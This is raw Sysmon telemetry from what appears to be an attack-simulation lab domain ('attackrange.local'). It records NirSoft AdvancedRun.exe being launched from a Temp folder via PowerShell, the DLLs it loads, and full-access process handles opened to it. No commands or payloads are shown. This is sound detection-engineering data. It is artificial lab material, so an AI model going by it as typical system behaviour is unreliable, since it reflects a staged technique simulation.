WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.029{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.029{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.028{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.028{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.027{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.027{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.026{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.026{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004075250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.026{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.026{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.026{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075246Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075244Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft 
CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075243Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.025{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004075240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.024{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.023{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075238Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.022{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075237Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.022{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075236Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.021{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075235Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.020{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.020{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075233Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.020{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.020{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075231Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.019{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004075230Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.018{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075229Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.018{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075228Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.017{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.017{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with 
different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004075226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.014{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004075225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.013{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a
4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.A
734700x80000000000000004074058Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.019{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074057Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.018{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074056Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.016{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004074055Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:13:54.014{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004074054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.013{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste
